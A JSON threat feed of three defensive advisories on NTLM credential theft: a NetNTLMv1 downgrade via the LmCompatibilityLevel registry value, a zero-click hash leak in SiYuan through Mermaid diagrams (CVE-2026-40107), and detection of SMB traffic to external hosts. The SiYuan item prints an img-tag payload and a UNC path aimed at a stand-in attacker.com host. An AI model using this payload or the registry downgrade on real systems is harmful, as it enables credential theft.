{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ntlm/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","Elastic Endgame"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","ntlm","registry-modification","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects a specific defense evasion technique where an attacker modifies the Windows registry to force a system to use the less secure NTLMv1 authentication protocol. This is known as a NetNTLMv1 downgrade attack. The registry modification involves changing the \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e value, which controls the authentication level. Attackers with local administrator privileges can perform this modification to weaken the authentication mechanism, making it easier to intercept and crack credentials. The rule is designed to detect this activity by monitoring registry events from various sources, including Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Crowdstrike. It is important to monitor for this activity as it can lead to credential theft and further compromise of the system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains local administrator privileges on a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a registry editor or command-line tool (e.g., \u003ccode\u003ereg.exe\u003c/code\u003e, PowerShell) to modify the \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e value in the registry.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to one of the following registry paths: \u003ccode\u003eHKLM\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel\u003c/code\u003e or \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker sets the \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e value to \u0026ldquo;0\u0026rdquo;, \u0026ldquo;1\u0026rdquo;, or \u0026ldquo;2\u0026rdquo; (or their hexadecimal equivalents \u0026ldquo;0x00000000\u0026rdquo;, \u0026ldquo;0x00000001\u0026rdquo;, \u0026ldquo;0x00000002\u0026rdquo;). These values force the system to use NTLMv1.\u003c/li\u003e\n\u003cli\u003eThe system now uses NTLMv1 for authentication attempts.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates a man-in-the-middle attack to capture NTLMv1 authentication traffic using tools like Responder or Inveigh.\u003c/li\u003e\n\u003cli\u003eThe captured NTLMv1 hashes are cracked using brute-force or dictionary attacks, revealing the user\u0026rsquo;s credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised credentials to gain unauthorized access to network resources or other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful NetNTLMv1 downgrade attack can lead to the compromise of user credentials, enabling attackers to move laterally within the network, access sensitive data, and potentially escalate privileges. The impact can range from data breaches to complete system compromise, depending on the attacker\u0026rsquo;s objectives and the compromised user\u0026rsquo;s privileges.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential NetNTLMv1 Downgrade Attack\u0026rdquo; to detect registry modifications setting \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e to insecure values (0, 1, 2) within the specified registry paths.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to ensure the necessary data is available for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eReview registry event logs for unauthorized modifications of \u003ccode\u003eLmCompatibilityLevel\u003c/code\u003e to confirm legitimate administrative actions.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies to limit local administrator privileges and reduce the attack surface.\u003c/li\u003e\n\u003cli\u003eMonitor the references URL for updates on recommended security configurations related to NTLM authentication.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-netntlmv1-downgrade/","summary":"This brief details a registry modification attack that downgrades the system to NTLMv1 authentication, enabling NetNTLMv1 downgrade attacks, typically performed with local administrator privileges on Windows systems.","title":"Potential NetNTLMv1 Downgrade Attack via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2026-05-netntlmv1-downgrade/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eWindows automatically sends the victim\u0026rsquo;s NTLMv2 hash to the attacker\u0026rsquo;s SMB server, or makes an HTTP request leaking victim\u0026rsquo;s IP on other platforms.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["exfiltration","credential-access","windows","smb","ntlm"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection strategy focuses on identifying unusual Server Message Block (SMB) traffic that originates from internal IP addresses and connects to external networks. The SMB protocol, commonly used for file and printer sharing within a network, can be exploited to exfiltrate data by injecting rogue UNC paths to capture NTLM credentials. This activity is often associated with threat actors attempting to steal credentials for lateral movement or data exfiltration. Defenders should be aware of this technique as it allows adversaries to bypass traditional security controls by leveraging a legitimate protocol for malicious purposes. This detection is relevant for environments utilizing Windows operating systems and SMB for internal network communications. The goal is to identify and alert on SMB connections to external IPs, excluding known safe ranges and legitimate business applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker compromises an internal system via phishing or other means (not detailed in source).\u003c/li\u003e\n\u003cli\u003eThe attacker injects a rogue UNC path into a document, email, or other medium.\u003c/li\u003e\n\u003cli\u003eA user opens the malicious document or clicks the injected link, triggering an SMB connection to a malicious external server.\u003c/li\u003e\n\u003cli\u003eThe SMB connection attempts to authenticate with the user\u0026rsquo;s NTLM credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker captures the NTLM hash from the authentication attempt.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to crack the NTLM hash to obtain the user\u0026rsquo;s password.\u003c/li\u003e\n\u003cli\u003eUsing the cracked password, the attacker gains unauthorized access to other systems and resources on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to credential theft, allowing attackers to gain unauthorized access to sensitive data and systems within the organization. This can result in data breaches, financial losses, and reputational damage. The impact is significant because SMB is a common protocol within many Windows environments, making this technique highly effective if not properly monitored.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SMB Connection to External IP\u0026rdquo; to your SIEM to identify potentially malicious SMB connections to the internet. Tune the rule by excluding known good external IPs used by legitimate services.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) with proper filtering to capture SMB traffic details as recommended in the linked setup guide, to enhance the fidelity of the detection.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to restrict SMB traffic to only necessary internal communications, reducing the attack surface and mitigating the risk of external exposure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-25T12:00:00Z","date_published":"2024-01-25T12:00:00Z","id":"/briefs/2024-01-rare-smb-exfiltration/","summary":"This brief details a detection strategy for rare SMB connections originating from internal networks to the internet, potentially indicating NTLM credential theft via rogue UNC path injection.","title":"Detecting Rare SMB Connections for Potential NTLM Credential Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-rare-smb-exfiltration/"}],"language":"en","title":"CraftedSignal Threat Feed — Ntlm","version":"https://jsonfeed.org/version/1.1"}